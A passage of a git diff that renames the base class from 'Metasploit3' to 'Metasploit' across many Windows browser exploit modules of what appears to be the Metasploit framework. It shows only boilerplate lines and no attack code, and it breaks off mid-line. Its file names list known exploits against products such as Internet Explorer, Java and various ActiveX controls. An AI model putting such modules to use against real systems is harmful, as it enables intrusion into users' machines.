b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 3a63699a2f..a99002c7a2 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb index b4ffe3edf2..baddb60210 100644 --- a/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb +++ b/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb index 62d06f8211..23c88a0e4a 100644 --- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb +++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb index 3a39839a25..6c5aaa67d7 100644 --- a/modules/exploits/windows/browser/chilkat_crypt_writefile.rb +++ b/modules/exploits/windows/browser/chilkat_crypt_writefile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb index b5f802fa7f..8039482163 100644 --- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb +++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb index 78466bd120..06a327adf5 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb index 814fc873d2..68fc8021fa 100644 --- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb +++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb index 663b4945a0..a782dfda65 100644 --- a/modules/exploits/windows/browser/citrix_gateway_actx.rb +++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb index e9a1aced93..17b158c269 100644 --- a/modules/exploits/windows/browser/clear_quest_cqole.rb +++ b/modules/exploits/windows/browser/clear_quest_cqole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/communicrypt_mail_activex.rb b/modules/exploits/windows/browser/communicrypt_mail_activex.rb index 3efacb9c49..5d3e22d9ac 100644 --- a/modules/exploits/windows/browser/communicrypt_mail_activex.rb +++ b/modules/exploits/windows/browser/communicrypt_mail_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb index 37adc9b873..a60da6e564 100644 --- a/modules/exploits/windows/browser/creative_software_cachefolder.rb +++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb index a92886b94d..a84c94cc7f 100644 --- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb +++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb index fe8ede5cbd..5ccccc458f 100644 --- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb +++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb index 1b5560873d..19e7df0843 100644 --- a/modules/exploits/windows/browser/dxstudio_player_exec.rb +++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ea_checkrequirements.rb b/modules/exploits/windows/browser/ea_checkrequirements.rb index 4ab495e851..4f2db95a56 100644 --- a/modules/exploits/windows/browser/ea_checkrequirements.rb +++ b/modules/exploits/windows/browser/ea_checkrequirements.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb index 921285149b..c43291a111 100644 --- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb +++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb index 3d3cdf9c3c..634c748826 100644 --- a/modules/exploits/windows/browser/enjoysapgui_comp_download.rb +++ b/modules/exploits/windows/browser/enjoysapgui_comp_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb index a45a935ef6..499754ca0a 100644 --- a/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb +++ b/modules/exploits/windows/browser/enjoysapgui_preparetoposthtml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/facebook_extractiptc.rb b/modules/exploits/windows/browser/facebook_extractiptc.rb index 7290b5d166..cd8105d550 100644 --- a/modules/exploits/windows/browser/facebook_extractiptc.rb +++ b/modules/exploits/windows/browser/facebook_extractiptc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb index 66f3e99668..54dbd09741 100644 --- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb +++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/getgodm_http_response_bof.rb b/modules/exploits/windows/browser/getgodm_http_response_bof.rb index 28762797c1..ea2d593c75 100644 --- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb +++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/browser/gom_openurl.rb b/modules/exploits/windows/browser/gom_openurl.rb index 1850394ce0..9e20771b04 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/greendam_url.rb b/modules/exploits/windows/browser/greendam_url.rb index a3394b541b..c34b7d135a 100644 --- a/modules/exploits/windows/browser/greendam_url.rb +++ b/modules/exploits/windows/browser/greendam_url.rb @@ -21,7 +21,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb index ec3f7c8ed2..189506de31 100644 --- a/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb +++ b/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/honeywell_tema_exec.rb b/modules/exploits/windows/browser/honeywell_tema_exec.rb index 13fa3b651c..00dc23faef 100644 --- a/modules/exploits/windows/browser/honeywell_tema_exec.rb +++ b/modules/exploits/windows/browser/honeywell_tema_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb index 550395255f..46d6a717f3 100644 --- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb +++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb index 55850db2a5..530466518d 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 9276a059e5..9ef9b17ed5 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index bc4efcd457..9e23331e21 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index 5b907dc8a2..0d85a1f36f 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb index e3d390f8eb..2688b05846 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb index 5c62ea02a1..83696623fd 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index dd64b699b0..c4b9f764ae 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb index a56df9c525..030008284a 100644 --- a/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb +++ b/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking # heap spray :-/ include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb index a8488b29d4..d6e7dec432 100644 --- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb +++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb index 772a924e42..c40ef85a1f 100644 --- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb +++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index f16b3b4c58..cff994a7cb 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index c966b6145b..247356f8b0 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cbutton_uaf.rb b/modules/exploits/windows/browser/ie_cbutton_uaf.rb index 96a4f7cfc7..a1e4d459e4 100644 --- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb +++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb index 96741d004e..aab4caf840 100644 --- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb +++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index 4b49aa83b6..9b1320e9c9 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb index 6db53caf87..588575a5b9 100644 --- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb +++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index 09d208386c..99611317c1 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Seh diff --git a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb index 1be71a45b7..950d7e89b7 100644 --- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb +++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index caab7e277b..aa8b0e2b61 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/util/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index fa0e081109..866abadb02 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb index 8abc7a8ae0..8fb77d35d2 100644 --- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb +++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb index d9bc4a1265..acc645077d 100644 --- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/intrust_annotatex_add.rb b/modules/exploits/windows/browser/intrust_annotatex_add.rb index 9456b7d5b6..5f6ee0218e 100644 --- a/modules/exploits/windows/browser/intrust_annotatex_add.rb +++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_basicservice_impl.rb b/modules/exploits/windows/browser/java_basicservice_impl.rb index 3e75330b62..f36b17bc1b 100644 --- a/modules/exploits/windows/browser/java_basicservice_impl.rb +++ b/modules/exploits/windows/browser/java_basicservice_impl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/windows/browser/java_cmm.rb b/modules/exploits/windows/browser/java_cmm.rb index 7ca72c586c..6f7340c33b 100644 --- a/modules/exploits/windows/browser/java_cmm.rb +++ b/modules/exploits/windows/browser/java_cmm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index cc88830088..998b591efd 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb index 52425ef4c4..211d649840 100644 --- a/modules/exploits/windows/browser/java_docbase_bof.rb +++ b/modules/exploits/windows/browser/java_docbase_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/java_mixer_sequencer.rb b/modules/exploits/windows/browser/java_mixer_sequencer.rb index d6c31e3ecb..d133611e8f 100644 --- a/modules/exploits/windows/browser/java_mixer_sequencer.rb +++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index bed81f6b2e..4c4e075fdc 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_double_quote.rb b/modules/exploits/windows/browser/java_ws_double_quote.rb index f57b207b6d..60393f76a6 100644 --- a/modules/exploits/windows/browser/java_ws_double_quote.rb +++ b/modules/exploits/windows/browser/java_ws_double_quote.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index e832ba3f89..556ed19fd4 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index c72124cf60..6931d0390e 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index c6cce237eb..dcbf6934b0 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb index 4502c63b37..bb43d095ea 100644 --- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb +++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 4397a6b09a..67eb160589 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ 